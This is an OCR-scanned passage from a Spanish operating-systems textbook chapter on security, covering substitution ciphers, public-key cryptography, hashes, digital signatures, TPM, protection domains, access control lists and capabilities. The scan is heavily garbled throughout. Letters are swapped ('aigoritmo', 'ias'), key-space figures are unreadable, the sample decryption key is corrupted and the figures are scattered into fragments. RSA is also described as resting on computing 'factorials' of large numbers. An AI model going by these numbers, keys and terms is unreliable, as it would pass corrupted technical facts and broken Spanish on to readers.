Para que esto sea más ciaro, considere un aigoritmo en ei que cada ietra se sustituye por una ietra 
distinta: por ejempio, todas ias As se sustituyen por Qs, todas ias Bs se sustituyen por Ws, todas ias 
Cs se sustituyen por Es, y así en io sucesivo: 
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texto simple: ABCDEFGHIJKLMNOPQRSTUVWXYZ 
texto cifrado: QWERTYUIOPASDFGHJKLZXCVBNM 

A este sistema general se le conoce como sustitución monoaifabética, en donde la clave es la ca¬ 
dena de 26 letras correspondiente al alfabeto completo. La clave de cifrado en este ejemplo es 
QWERTYUIOPASDFGHJKLZXCVBNM. Utilizando la clave anterior, el texto simpleATTACK se 
transformaría en el texto cifrado QZZQEA. La clave de descifrado indica cómo obtener de vuelta 
el texto simple a partir del texto cifrado. En este ejemplo, la clave de descifrado es KXVMC- 
NOPHQRSZYIjADLEGWBUFT, debido a que una A en el texto cifrado es una K en el texto sim¬ 
ple, una B en el texto cifrado es una X en el texto simple, y así sucesivamente. 

En primera instancia esto podría parecer un sistema seguro, pues aunque el criptoanalista co¬ 
nozca el sistema general (sustitución de letra por letra), no sabe cuál de las 26! ^ 4 x 10^® posi¬ 
bles claves se está utilizando. Sin embargo, cuando el texto cifrado es muy poco, la clave se puede 
descubrir con facilidad. El ataque básico saca provecho de las propiedades estadísticas de los lengua¬ 
jes naturales. Por ejemplo, en inglés la letra e es la más común, seguida det, o, a, n, i, etc. Las com¬ 
binaciones más comunes de dos letras, conocidas como bigramas, son th, in, er, re y así, en lo 
sucesivo. Es fácil quebrantar el cifrado si se utiliza este tipo de información. 

M uchos sistemas criptográficos como el anterior tienen la propiedad de que, dada la clave de ci¬ 
frado, es fácil encontrar la clave de descifrado, y viceversa. A dichos sistemas se les conoce como 
criptografía de clave secreta o criptografía de clave simétrica. A unque los cifrados de sustitución 
monoaifabética son completamente inútiles, hay otros algoritmos de clave simétrica conocidos 
que son relativamente seguros si las claves son lo bastante largas. Para una seguridad formal, se 
deben utilizar como mínimo claves de 256 bits, con lo cual se obtiene un espacio de búsqueda de 
2256 ^ 12 X 10^^ claves. Las claves más cortas pueden frustrar a los amateurs, pero no a los prin¬ 
cipales gobiernos. 


9.2.2 C riptografía de clave pública 

Los sistemas de clave secreta son eficientes debido a que el monto de cálculos requeridos para ci¬ 
frar o descifrar un mensaje es razonable, pero hay una gran desventaja: el emisor y el receptor de¬ 
ben tener la clave secreta compartida. De hecho, tal vez hasta tengan que reunirse físicamente para 
que uno le entregue la clave al otro. Para resolver este problema se utiliza la criptografía de clave 
pública (Diffie y Hellman, 1976). Este sistema tiene la propiedad de que se utilizan distintas cla¬ 
ves para el cifrado y el descifrado, y si se elige bien la clave de cifrado es casi imposible descubrir 
la clave de descifrado correspondiente. Bajo estas circunstancias, la clave de cifrado se puede ha¬ 
cer pública y sólo hay que mantener secreta la clave de descifrado privada. 

Para que el lector vea cómo funciona la criptografía de clave pública, considere las siguientes 
dos preguntas: 

Pregunta 1: ¿Cuánto es 314159265358979 x 314159265358979? 

Pregunta 2: ¿Cuál es la raíz cuadrada de 39125715064193870905948285082417 
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La mayoría de los estudiantes de sexto grado podrían contestar la pregunta 1 en una o dos ho¬ 
ras si les damos lápiz, papel y les prometemos un gran cono de helado si obtienen la respuesta co¬ 
rrecta. La mayoría de los adultos necesitaría una calculadora, computadora u otro tipo de ayuda 
externa para resolver la pregunta 2, si les damos lápiz, papel y la promesa de una reducción de 50% 
de por vida en los impuestos. Aunque el cuadrado y la raíz cuadrada son operaciones inversas, tie¬ 
nen grandes diferencias en cuanto a su complejidad computacional. Este tipo de asimetría forma la 
base de la criptografía de clave pública. El cifrado utiliza la operación sencilla, pero para el desci¬ 
frado sin la clave se necesita la operación difícil. 

Flay un sistema de clave pública llamado RSA, el cual explota el hecho deque para una compu¬ 
tadora es mucho más fácil multiplicar números muy grandes que obtener el factorial de números 
muy grandes, en especial cuando todas las operaciones aritméticas se realizan mediante la aritmé¬ 
tica de módulo y todos los números involucrados tienen cientos de dígitos (Rivesty colaboradores, 
1978). Este sistema se utiliza mucho en el mundo de la criptografía. También se utilizan sistemas 
basados en logaritmos discretos (El Gamal, 1985). El principal problema con la criptografía decla¬ 
ve pública es que es mil veces más lenta que la criptografía simétrica. 

Veamos ahora la manera en que funciona la criptografía de clave pública: todos eligen un par 
(clave pública, clave privada) y publican la clave pública. Esta clave pública es la clave de cifrado: 
la clave privada es la clave de descifrado. Por lo general, el proceso de generación de la clave es 
automatizado, en donde tal vez una contraseña seleccionada por el usuario se alimenta al algoritmo 
como una semilla. Para enviar un mensaje secreto a un usuario, un corresponsal cifra el mensaje 
con la clave pública del receptor. Como sólo el receptor tiene la clave privada, sólo él puede desci¬ 
frar el mensaje. 

9.2.3 F unciones de una vía 

Fl ay varias situaciones, que veremos más adelante, donde es deseable tener cierta función f con la 
siguiente propiedad: dada f y su parámetro x, es fácil calcular y = f(x), pero si sólo se tiene f(x) es 
imposible calcular el valor de x. Comúnmente dicha función manipula los bits en formas comple¬ 
jas. Podría empezar por inicializar y con x. Después podría ejecutar un ciclo que itere todas las ve¬ 
ces que haya bits 1 en x, y en cada iteración se permutarían los bits de y de una manera 
independiente a la iteración, agregando una constante distinta en cada iteración, y mezclando en 
general los bits minuciosamente. A dicha función se le conoce como función de hash criptográ¬ 
fica. 


9.2.4 Firmas digitales 

Con frecuencia es necesario firmar un documento en forma digital. Por ejemplo, suponga que un 
cliente pide a su banco que compre ciertas acciones, para lo cual le envía un mensaje de correo elec¬ 
trónico. U na hora después de haber enviado y ejecutado la orden, las acciones se desploman. A ho¬ 
ra el cliente niega incluso haber enviado el correo electrónico. Desde luego que el banco puede 
presentar el correo electrónico, pero el el i ente puede afirmar que el banco lo falsificó para poder ob¬ 
tener una comisión. ¿Cómo puede saber un juez quién está diciendo la verdad? 
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Las firmas digitales hacen que sea posible firmar correos electrónicos y otros documentos di¬ 
gitales, de tal forma que el emisor no los pueda repudiar después. U na manera común es pasar pri¬ 
mero el documento a través de un algoritmo de hashing criptográfico de una vía, quesea muy difícil 
de invertir. Por lo general, la función de hashing produce un resultado de longitud fija, independien¬ 
te del tamaño del documento original. Las funciones de hashing más populares son: MD5 (Algo¬ 
ritmo de firma de mensajes 5), el cual produce un resultado de 16 bytes (Rivest, 1992) y SHA-1 
(Aigoritmo de hash seguro), que produce un resultado de 20 bytes (NIST, 1995). Las versiones 
más recientes de SHA-1 son SHA-256y SHA-512, que producen resultados de 32 y 64 bytes, res¬ 
pectivamente, pero se utilizan con menos frecuencia en la actualidad. 

El siguiente paso asume que se está utilizando la criptografía de clave pública como vimos an¬ 
tes. Entonces, el propietario del documento aplica su clave privada al hash para obtener D(hash). 
Este valor, conocido como bioque de firma, se adjunta al documento y se envía al receptor, como 
se muestra en la figura 9-3. Al proceso de aplicar D al hash se le conoce algunas veces como des¬ 
cifrar el hash, pero en realidad no es un descifrado debido a que el hash no se ha cifrado. Es sólo 
una transformación matemática aplicada al hash. 



El documento 





se comprime 

El valor de hash 



en un valor 

se pasa a través de D 


Documento 

de hash 



Documento 

original 


Hash 

-D(Hash) 

original 


(a) 

Bloque r 
de firma l 

D(Hash) 


(b) 


Figura 9-3. (a) Cálculo de un bloque de firma, (b) Lo que obtiene el receptor. 


Cuando llegan el documento y el hash, el receptor calcula primero el hash del documento me¬ 
diante el uso de M D5 o SH A, según lo que hayan acordado de antemano. Después, el receptor apli¬ 
ca la clave pública del emisor al bloque de firma para obtener E(D (hash)). En efecto, "cifra" el hash 
descifrado, lo cancela y obtiene el hash de vuelta. Si el hash calculado no coincide con el hash del 
bloque de firma, significa que se alteró el documento, el bloque de firma o ambos (o que se modi¬ 
ficaron por accidente). El valor de este esquema es que aplica la criptografía de clave pública (len¬ 
ta) sólo a una pieza de datos relativamente pequeña: el hash. Tenga muy en cuenta que este método 
sólo funciona si para todas las x 

E(D(x)) =x 

N o se garantiza a prior! que todas las funciones de cifrado vayan a tener esta propiedad, pues lo que 
habíamos pedido en un principio era que 


D(E(x)) =x 
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es decir, E es la función de cifrado y D es la función de descifrado. Para obtener la propiedad de la 
firma en la suma, el orden de aplicación no debe importar; es decir, D y E deben ser funciones con¬ 
mutativas. Por fortuna, el algoritmo RSA tiene esta propiedad. 

Para utilizar este esquema de firma, el receptor debe conocer la clave pública del emisor. Al¬ 
gunos usuarios publican su clave pública en su página Web. Otros no lo hacen debido al temor de 
que un intruso entre a su sistema y altere su clave sin que se enteren. Para ellos se requiere un me¬ 
canismo alternativo para distribuir claves públicas. Un método común es que los emisores de un 
mensaje adjunten al mismo un certificado, el cual contiene el nombre del usuario y la clave públi¬ 
ca, y está firmado digital mente por una tercera parte de confianza. Una vez que el usuario haya ad¬ 
quirido la clave pública de la tercera parte de confianza, puede aceptar certificados de todos los 
emisores que utilicen esta tercera parte de confianza para generar sus certificados. 

A un tercero de confianza que firma certificados se le conoce como CA Certification Authority 
(Autoridad de certificación). Sin embargo, para que un usuario pueda verificar un certificado firma¬ 
do por una CA, necesita su clave pública. ¿De dónde proviene eso y cómo sabe el usuario que es 
real? En general, se requiere todo un esquema para administrar claves públicas, conocido como PKI 
Public Key Infrastructure (Infraestructura declaves públicas). Para los navegadores Web, el proble¬ 
ma se resuelve ad hoc: todos los navegadores tienen ya cargadas las claves públicas de aproxima¬ 
damente 40 CAs populares. 

Acabamos de ver cómo se puede utilizar la criptografía de clave pública para las firmas digi¬ 
tales. Vale la pena mencionar que también existen esquemas que no involucran la criptografía de 
clave pública. 

9.2.5 M ódulo de plataforma confiable 

Toda la criptografía requiere claves. Si se comprometen las claves, también se compromete toda la 
seguridad que se basa en ellas. Por lo tanto, es esencial almacenar las claves de una forma segura. 
¿Cómo almacenamos claves en forma segura en un sistema que no es seguro? 

La industria ha propuesto utilizar un chip llamado TPM (Trusted Platform M odules, M ódu- 
los de plataforma confiables), un criptoprocesador que contiene almacenamiento no volátil pa¬ 
ra guardar las claves. El TPM puede realizar operaciones criptográficas como cifrar bloques de 
texto simple o descifrar bloques de texto cifrado en la memoria principal. También puede verifi¬ 
car firmas digitales. Al realizar estas operaciones en un hardware especializado, se pueden reali¬ 
zar con más velocidad y es probable que se utilicen con más frecuencia. Algunas computadoras ya 
tienen chips TPM y es muy probable que muchas computadoras más los vayan a incluir en el fu¬ 
turo. 

El TPM es muy controversia!, ya que hay distintas partes que tienen ideas diferentes acerca de 
quién va a controlar el TPM y de quién se va a proteger. M icrosoft es un gran defensor de ese con¬ 
cepto y ha desarrollado una serie de tecnologías para utilizarlo, incluyendo Palladium, NGSCB y 
BitLocker. En su punto de vista, el sistema operativo controla el TPM para evitar que se ejecute el 
software no autorizado. El "software no autorizado" podría ser software pirata (es decir, copias ile¬ 
gales) o sólo software que el sistema operativo no autorice. Si el TPM está involucrado en el pro¬ 
ceso de arranque, podría iniciar sólo los sistemas operativos firmados por el fabricante mediante una 
clave secreta colocada dentro del TPM, que se divulgue sólo a ciertos distribuidores de sistemas 
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operativos (como M icrosoft). Por lo tanto, el TPM se podría utilizar para limitar las opciones délos 
usuarios en cuanto al software, para que sólo puedan seleccionar el software aprobado por el fabri¬ 
cante de computadoras. 

Las industrias de la música y las películas también tienen mucho interés en el TPM, ya que se 
podría utilizar para evitar que pirateen su contenido. También podría abrir nuevos modelos de ne¬ 
gocios, como rentar canciones o películas durante cierto periodo específico y dejar de descifrarlas 
después de una fecha de expiración. 

El TPM tiene muchos usos más, pero por falta de espacio no los veremos aquí. Lo interesante 
esqueTPM no ayuda a que las computadoras sean más seguras contra los ataques externos. En rea¬ 
lidad se enfoca en el uso de la criptografía para evitar que los usuarios hagan algo que no esté apro¬ 
bado de manera directa o indirecta por la entidad que controle el TPM . Si desea aprender más sobre 
este tema, el artículo sobre Trusted Computing (Computación confiable) en Wikipedia es un buen 
lugar para empezar. 


9.3 MECANISMOS DE PROTECCIÓN 

Es más fácil obtener seguridad si hay un modelo claro de lo que se debe proteger y dea quién se le 
permite hacer qué cosa. En este campo se ha realizado una cantidad considerable de trabajo, por lo 
que sólo podemos arañar la superficie. Nos concentraremos en unos cuantos modelos generales y 
en los mecanismos para llevarlos a cabo. 

9.3.1 Dominios de protección 

Un sistema computacional contiene muchos "objetos" que necesitan protección. Estos objetos pue¬ 
den ser de hardware (por ejemplo, CPUs, segmentos de memoria, unidades de disco o impresoras) 
o de software (por ejemplo, procesos, archivos, bases de datos o semáforos). 

Cada objeto tiene un nombre único que se utiliza como referencia, y hay un conjunto finito de 
operaciones que los procesos pueden llevar a cabo con los objetos. Las operaciones read y write 
son apropiadas para un archivo: up y down se utilizan en un semáforo. 

Es obvio que se necesita una manera de prohibir que los procesos utilicen objetos sin autoriza¬ 
ción. Además, mediante este mecanismo se debe poder restringir a los procesos para que sólo pue¬ 
dan utilizar un conjunto de las operaciones legales cuando sea necesario. Por ejemplo, el proceso A 
tal vez tenga permiso de leer, pero no de escribir en el archivo F. 

Para poder analizar distintos mecanismos de protección, es conveniente introducir el concepto 
de un dominio. Un dominio es un conjunto de pares (objeto, permisos). Cada par especifica un ob¬ 
jeto y cierto subconjunto de las operaciones que se pueden realizar en él. Un permiso en este con¬ 
texto indica el permiso para realizar una de las operaciones. A menudo, un dominio corresponde a 
un solo usuario y le indica lo que puede hacer y lo que no, pero un dominio también puede ser más 
general que sólo un usuario. Por ejemplo, los miembros de un equipo de programación que traba¬ 
jan en cierto proyecto podrían pertenecer al mismo dominio, de manera que todos tengan acceso a 
los archivos del proyecto. 
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La manera en que se asignan los objetos a los dominios depende de los detalles sobre quién 
necesita saber qué. Sin embargo, uno délos conceptos básicos es el POLA (Principie of Least Au- 
thority, Principio de menor autoridad), o la necesidad de saber. En general, la seguridad funciona 
mejor cuando cada dominio tiene los mínimos objetos y privilegios para realizar su trabajo: y no 
más. 

En la figura 9-4 se muestran tres dominios, los objetos en cada dominio y los permisos dispo¬ 
nibles en cada objeto: R (lectura), W (escritura) y X (ejecución). Observe que Impresoral está en 
dos dominios al mismo tiempo, y tiene los mismos permisos en cada uno. Archivol también está 
en dos dominios, pero tiene distintos permisos en cada uno. 


Dominio 1 


Dominio 2 


Dominio 3 



Archivol [RW] 

Archivo4[RWX] 

Archivo5[RW] 



Figura 9-4. Tres dominios de protección. 


En cada instante cada proceso se ejecuta en cierto dominio de protección. En otras palabras, 
hay cierta colección de objetos a los que puede acceder, y para cada objeto tiene cierto conjunto de 
permisos. Los procesos también pueden cambiar de un dominio a otro durante la ejecución. Las re¬ 
glas para cambiar de domino son muy dependientes del sistema. 

Para que la idea sobre un dominio de protección sea más concreta, vamos a analizar a UNIX 
(incluyendo a Linux, FreeBSD y sus amigos). En UNIX, el dominio de un proceso se define me¬ 
diante su UID y su GID. Cuando un usuario inicia sesión, su shell recibe en el archivo de contrase¬ 
ñas el UID y el GID contenidos en su entrada, y todos sus hijos los heredan. Dada cualquier 
combinación (UID, GID), es posible crear una lista completa de todos los objetos (archivos, inclu¬ 
yendo los dispositivos de E/S representados por archivos especiales, etc.) a los que se puede acce¬ 
der, y si se pueden utilizar para leer, escribir o ejecutar. Dos procesos con la misma combinación 
(UID, GID) tendrán acceso al mismo conjunto exacto de objetos. Los procesos con distintos valo¬ 
res (UID, GID) tendrán acceso a un conjunto distinto de archivos, aunque se pueden traslapar en 
forma considerable. 

Además, cada proceso en UNIX tiene dos mitades: la parte del usuario y la parte del kernel. 
Cuando el proceso realiza una llamada al sistema, cambia de la parte del usuario a la parte del ker¬ 
nel. Esta parte tiene acceso a un conjunto distinto de objetos que el déla parte del usuario. Por ejem¬ 
plo, el kernel puede acceder a todas las páginas en la memoria física, todo el disco y todos los demás 
recursos protegidos. Por ende, una llamada al sistema produce un cambio de dominio. 

Cuando un proceso realiza una operación exec en un archivo con el bitSETUID o SETGID en¬ 
cendido, adquiere un nuevo UID o GID efectivo. Con una combinación distinta de (UID, GID), 
tiene a su disposición un conjunto distinto de archivos y operaciones. La ejecución de un programa 
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con SETU ID o SETGID también produce un cambio de dominio, ya que cambian ios permisos dis- 
ponibies. 

Una cuestión importante es ia forma en que ei sistema iieva ei registro de ios dominios y qué 
objetos pertenecen a cada uno deeiios. En concepto, podemos por io menos imaginar una gran ma¬ 
triz donde ias fiias son ios dominios y ias coiumnas ios objetos. Cada cuadro iista ios permisos (si 
ios hay) que contiene ei dominio para ei objeto. En ia figura 9-5 se muestra ia matriz para ia figu¬ 
ra 9-4. Dada esta matriz y ei número de dominio actuai, ei sistema puede saber si se permite ei ac¬ 
ceso a un objeto dado de una manera específica, y desde cierto dominio. 

Objeto 


Dominio 

1 

Archivol 

Archivo2 

Archivos 

Archivo4 

Archivos 

Archivos 

impresoral 

Piotter2 

Lectura 

Lectura 

Escritura 







2 



Lectura 

Lectura 

Escritura 

Ejecución 

Lectura 

Escritura 


Escritura 


3 






Lectura 

Escritura 

Ejecución 

Escritura 

Escritura 


Figura 9-5. U na matriz de protección. 


Se puede inciuir con faciiidad ei cambio de dominio en ei modeio de ia matriz, para io cuai 
sóio hay que tener en cuenta que un dominio es en sí un objeto, con ia operación enter. La figu¬ 
ra 9-6 muestra ia matriz de ia figura 9-5 de nuevo, sóio que ahora con ios tres dominios como ob¬ 
jetos. Los procesos en ei dominio 1 se pueden cambiar ai dominio 2, pero una vez ahí no pueden 
regresar. Esta situación modeia i a ejecución de un programa SET UID en UNIX.En este ejemplo no 
se permite ningún otro cambio de dominio. 


Objeto 


Archivol 

C\J 

o 

> 

ü 

< 

Archivos 

o 

> 

ü 

< 

Archivos Archivos Impresoral 

Plotter2 

Dominiol 

Dominios 

Dominios 

Lectura 

Lectura 

Escritura 








Enter 




Lectura 

Lectura 

Escritura 

Ejecución 

Lectura 

Escritura 


Escritura 










Lectura 

Escritura 

Ejecución 

Escritura 

Escritura 





Figura 9-6. U na matriz de protección con dominios como objetos. 

9.3.2 L istas de control de acceso 

En la práctica raras veces se almacena la matriz de la figura 9-6, ya que es extensa y escasa. La 
mayoría de los dominios no tienen acceso a la mayoría de los objetos, por lo que se desperdicia 
mucho espacio en disco al almacenar una matriz muy grande y en su mayor parte vacía. Sin em¬ 
bargo, hay dos métodos prácticos: almacenar la matriz por filas o columnas, y después almacenar 
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sólo los elementos no vacíos. Los dos métodos son en extremo diferentes. En esta sección anaii- 
zaremos ei método de aimacenar ia matriz por coiumna; en ia siguiente sección estudiaremos ei 
otro método. 

La primera técnica consiste en asociar con cada objeto una iista (ordenada) que contenga todos 
ios dominios que pueden acceder ai objeto, y ia forma de hacerio. A esta iista se ie conoce como 
Lista de control de acceso (Access Controi List, o ACL) y se iiustra en ia figura 9-7. Aquí pode¬ 
mos ver tres procesos, cada uno de ios cuaies pertenece a un dominio distinto: A, B y C, y tres ar¬ 
chivos Fl, F2 y F3. Por simpiicidad vamos a suponer que cada dominio corresponde a sóio un 
usuario: en este caso, ios usuarios A, B y C. En ia iiteratura sobre seguridad, a ios usuarios se Íes 
denomina con frecuencia sujetóse protagonistas, para contrastados con ias cosas que tienen due¬ 
ño: ios objetos, como ios archivos. 



Espacio 
^de usuario 


> 


Espacio 
de kernei 


Figura 9-7. U so de las listas de control de acceso para administrar el acceso 
a los archivos. 

Cada archivo tiene una ACL asociada. Ei archivo F1 tiene dos entradas en su ACL (separadas 
por un punto y coma). La primera entrada indica quecuaiquier proceso quesea propiedad dei usua¬ 
rio A puede ieer y escribir en ei archivo. La segunda entrada indica que cuaiquier proceso que sea 
propiedad dei usuario B puede ieer ei archivo. Todos ios demás accesos para estos usuarios y ios 
accesos para otros usuarios están prohibidos. Observe que ios permisos se otorgan por usuario y no 
por proceso. En cuanto a io queei sistema de protección concierne, cuaiquier proceso que sea pro¬ 
piedad dei usuario A puede ieery escribir en ei archivo F1. No importa si hay un proceso o 100; io 
que importa es ei propietario y no ia ID dei proceso. 

Ei archivo F 2 tiene tres entradas ensuACL:A, ByC pueden ieer ei archivo, y además B pue¬ 
de escribir en éi. No se permiten otros accesos. Parece ser que ei archivo F3 es un programa ejecu- 
tabie, ya que B y C pueden ieerio y ejecutado. B también puede escribir en éi. 

Esteejempio iiustra ia forma más básica de protección con iasACLs. A menudo seutiiizan sis¬ 
temas más sofisticados en ia práctica. Para empezar, hasta ahora sóio hemos mostrado tres permi¬ 
sos: iectura, escritura y ejecución. Puede haber también permisos adicionaies. Aigunos de eiios 
pueden ser genéricos, es decir, que se apiiquen a todos ios objetos, y aigunos pueden ser específi¬ 
cos para cada objeto. Aigunos ejempios de permisos genéricos son destroy object (destruir objeto) 
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y copy object (copiar objeto). Estos permisos se pueden apiicar en cuaiquier objeto, sin importar 
cuái sea su tipo. Los permisos específicos para cada objeto pueden ser append message (adjun¬ 
tar mensaje) para un objeto bandeja de correo y sort aiphabeticaiiy (ordenar aifabéticamente) pa¬ 
ra un objeto directorio. 

Hasta ahora, ias entradas en ia ACL han sido para usuarios individuaies. M uchos sistemas in¬ 
tegran ei concepto de un grupo de usuarios. Los grupos tienen nombres y se pueden inciuir en ias 
ACLs. Hay dos variaciones posibies en ia semántica de ios grupos. En ciertos sistemas, cada pro¬ 
ceso tiene un ID de usuario (UID) y un ID de grupo (GID). En dichos sistemas, una entrada en ia 
ACL conti ene entradas de i a forma 

UID1, GID1: permisos!; LJID2, GID2: permisos2; ... 

Bajo estas condiciones, cuando se hace una petición para acceder a un objeto, se reaiiza una com¬ 
probación mediante ei uso dei UID y ei GUID dei proceso que hizo ia iiamada. Si están presentes 
en ia ACL, están disponibies ios permisos iistados. Si ia combinación (UID, GID) no está en la lis¬ 
ta, no se permite el acceso. 

Al utilizar los grupos de esta forma se introduce en efecto el concepto de un rol. Considere una 
instalación de computadoras en la queTana es administradora del sistema, y por ende está en el gru¬ 
po sysadm. Sin embargo, suponga que la empresa también tiene clubs para empleados y queTana 
es miembro del club de colombófilos. Los miembros del club pertenecen al grupo fanpichones y tie¬ 
nen acceso a las computadoras de la empresa para administrar su base de datos de pichones. En la 
figura 9-8 se muestra una porción de lo que podría ser laACL. 


Archivo 

Lista de controi de acceso 

Password 

Tana, sysadm: RW 

Pichones_data 

bilí, fanpichones: RW; tana, fanpichones: RW;... 


Figura 9-8. Dos listas de control de acceso. 

Si Tana trata de acceder a uno de estos archivos, el resultado depende del grupo al que se en¬ 
cuentre conectada en ese momento. Cuando inicie sesión, el sistema le puede pedir que seleccione 
cuál de sus grupos está utilizando, o podría inclusive tener distintos nombres de inicio de sesión y/o 
contraseñas para mantenerlos separados. El objetivo de este esquema es evitar queTana acceda al 
archivo de contraseñas cuando esté utilizando el grupo de fanáticos de pichones. Sólo puede hacer 
eso cuando esté conectada como administradora del sistema. 

En algunos casos, un usuario puede tener acceso a ciertos archivos sin importar qué grupo es¬ 
té utilizando en ese momento. Para manejar este caso vamos a introducir el concepto de comodín, 
que representa a todos los usuarios. Por ejemplo, la entrada 

tana, *: RW 

para el archivo de contraseñas proporciona acceso a Tana sin importar en qué grupo se encuentre. 
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Otra posibilidad más es que, si un usuario pertenece a cualquiera de los grupos que tengan cier¬ 
tos permisos de acceso, se permite el acceso. La ventaja aquí es que un usuario que pertenezca a va¬ 
rios grupos no tiene que especificar el grupo que va a usar al momento de iniciar sesión. Todos los 
grupos son válidos en todo momento. Una desventaja de este método es que no hay tanto encapsu- 
lamiento: Tana puede editar el archivo de contraseñas durante una reunión con el club de pichones. 

Al utilizar grupos y comodines se introduce la posibilidad de bloquear de manera selectiva a 
un usuario específico, para evitar que acceda a un archivo. Por ejemplo, la entrada 

virgil, *: (none); *, *: RW 

proporciona a todos, excepto a Virgil, el acceso de lectura y escritura al archivo. Esto funciona de¬ 
bido a que las entradas se exploran en orden, y se toma la primera que se aplique: las entradas sub¬ 
siguientes ni siquiera se examinan. Hay una coincidencia para Virgil en la primera entrada y 
se aplican los derechos de acceso encontrados, que en este caso son "ninguno" ("none"). La bús¬ 
queda termina en ese punto. El hecho de que el resto del mundo tenga acceso ni siquiera se con¬ 
sidera. 

La otra manera de lidiar con los grupos es no tener entradas en la ACL que consistan en pares 
(UID, GID), sino que cada entrada sea un UID o un GID. Por ejemplo, una entrada para el archivo 
pichones_data podría ser 

debbie: RW; phil: RW; fanpichones: RW 

lo cual significa que Debbie y Phil, y todos los miembros del grupo fanpichones tienen acceso de 
lectura y de escritura al archivo. 

Algunas veces sucede que un usuario o un grupo tiene ciertos permisos con respecto a un ar¬ 
chivo, y posteriormente el propietario del archivo desea revocar esos permisos. Con las listas de 
control de acceso es muy sencillo revocar un acceso que se haya otorgado antes. Todo lo que hay 
que hacer es editar la ACL para realizar el cambio. No obstante, si la ACL se revisa sólo cuando se 
abre un archivo, es muy probable que el cambio tenga efecto únicamente en las futuras llamadas a 
open. Cualquier archivo que ya se encuentre abierto seguirá con los derechos que tenía cuando se 
abrió, aun si el usuario ya no está autorizado para utilizarlo. 

9.3.3 Capacidades 

La otra manera de dividir la matriz de la figura 9-6 es por filas. AI utilizar este método, a cada pro¬ 
ceso se le asocia una lista de objetos que puede utilizar, junto con una indicación de las operacio¬ 
nes permitidas en cada objeto: en otras palabras, su dominio. A esta lista se le conoce como lista de 
capacidades (o lista-C ) y a los elementos individuales que contiene se les conoce como capacida¬ 
des (Dennis y Van Horn, 1966, Fabry, 1974). En la figura 9-9 se muestra un conjunto de tres pro¬ 
cesos y sus listas de capacidades. 

Cada capacidad otorga al propietario ciertos derechos sobre un objeto. Por ejemplo, en la figu¬ 
ra 9-9, el proceso que pertenece al usuario A puede leer los archivos F1 y F2. Por lo general, una 
capacidad consiste en un identificador de archivo (o un objeto, en sentido más general) y un mapa 
de bits para los diversos permisos. En un sistema como UNIX el identificador de archivo proba- 
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Proceso 



Propietario 




F1:R 


F2:RW 


F3:RWX 



F2:R 


F3:RX 


\ 


Lista-C 


Espacio 
de usuario 


Espacio 
de kernei 


Figura 9-9. Cuando se utilizan las capacidades, cada proceso tiene una lista 
de capacidades. 


blemente sería el número de nodo-i. Las listas de capacidades son objetos en sí y otras listas de ca¬ 
pacidades pueden apuntar a ellas, con lo cual se facilita la acción de compartir subdominios. 

Es bastante obvio que debemos proteger las listas de capacidades contra los usuarios que quie¬ 
ran alterarlas. Hay tres métodos para protegerlas. El primero requiere una arquitectura etiqueta¬ 
da, un diseño de hardware en el que cada palabra de memoria tiene un bit adicional (o etiqueta) que 
indica si esa palabra contiene o no una capacidad. El bit de etiqueta no se utiliza en las instruccio¬ 
nes aritméticas, de comparación o instrucciones ordinarias similares, y sólo los programas que se 
ejecutan en modo de kernei (es decir, el sistema operativo) pueden modificarlo. Se han construido 
máquinas con arquitectura etiquetada y pueden funcionar bien (Feustal, 1972). La IBM AS/400 es 
un ejemplo popular. 

El segundo método es mantener la lista-C dentro del sistema operativo. Así, se hace referencia 
a las capacidades con base en su posición en la lista. Un proceso podría decir: "Leer 1KB del ar¬ 
chivo al que apunta la capacidad 2". Esta forma de direccionamiento es similar al uso de los des¬ 
criptores de archivos en UNIX. Hydra (Wulf y colaboradores, 1974) trabajaba de esta forma. 

El tercer método es mantener la lista-C en espacio de usuario, pero administrar las capacidades 
de manera criptográfica, de tal forma que los usuarios no puedan alterarlas. Este método se adapta 
en especial a los sistemas distribuidos y funciona de la siguiente manera. Cuando un proceso clien¬ 
te envía un mensaje a un servidor remoto (por ejemplo, un servidor de archivos) para crear un ob¬ 
jeto, el servidor crea el objeto y genera un número aleatorio extenso (el campo de comprobación) 
que le corresponda. Se reserva una posición en la tabla de archivos del servidor para el objeto, y el 
campo de comprobación se almacena en el servidor, en el nodo-i. No se envía de vuelta al usuario 
y nunca se pone en la red. Después, el servidor genera y devuelve una capacidad al usuario, de la 
forma como se muestra en la figura 9-10. 

La capacidad que se devuelve al usuario contiene el identificador del servidor, el número de 
objeto (el índice en las tablas del servidor; es decir, el número de nodo-i) y los derechos, todo al¬ 
macenado como un mapa de bits. Para un objeto recién creado se encienden todos los bits de per¬ 
misos (desde luego), ya que el propietario puede hacer todo. El último campo consiste en la 
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Servidor 

Objeto 

Permisos 

f(Ob]etos, Permisos, Comprobación) 


Figura 9-10. U na capacidad protegida mediante criptografía. 

concatenación del objeto, los permisos y el campo de comprobación, los cuales se pasan a través de 
una función de una vía criptográficamente segura (f), del tipo que vimos antes. 

Cuando el usuario desea acceder al objeto, envía la capacidad al servidor como parte de la pe¬ 
tición. Después el servidor extrae el número de objeto para indexarlo en sus tablas y encontrar el 
objeto. Después calcula fjObjeto, Permisos, Comprobación), para lo cual toma los primeros dos pa¬ 
rámetros de la misma capacidad y el tercero de sus propias tablas. Si el resultado coincide con el 
cuarto campo en la capacidad, se respeta la petición; en caso contrario, se rechaza. Si el usuario tra¬ 
ta de acceder al objeto de alguien más, no podrá fabricar el cuarto campo correctamente, ya que no 
conoce el campo de comprobación y la petición se rechaza. 

Un usuario puede pedir al servidor que produzca una capacidad más débil; por ejemplo, para 
acceso de sólo lectura. Primero, el servidor verifica que la capacidad sea válida. De ser así, calcula 
f (Objeto, Nuevos_permisos, Comprobación), genera una nueva capacidad y coloca su valor en el 
cuarto campo. Observe que se utiliza el valor original de Comprobación debido a que las capacida¬ 
des destacadas dependen de ello. 

Esta nueva capacidad se envía de vuelta al proceso que hizo la petición. A hora el usuario pue¬ 
de proporcionarla a un amigo con sólo enviarla en un mensaje. Si el amigo enciende los bits de per¬ 
misos que deben estar apagados, el servidor lo detectará cuando se utilice la capacidad, ya que el 
valor de f no corresponderá con el campo de los permisos falsos. Como el amigo no conoce el ver¬ 
dadero campo de comprobación, no puede fabricar una capacidad que corresponda con los bits de 
permisos falsos. Este esquema se desarrolló para el sistema A moeba (Tanenbaum y colaboradores, 
1990). 

Además de los derechos específicos dependientes del objeto, como lectura y ejecución, las ca¬ 
pacidades (que se protegen mediante el kernel y criptografía) por lo general tienen permisos gené¬ 
ricos que se pueden aplicar a todos los objetos. A Igunos ejemplos de permisos genéricos son: 

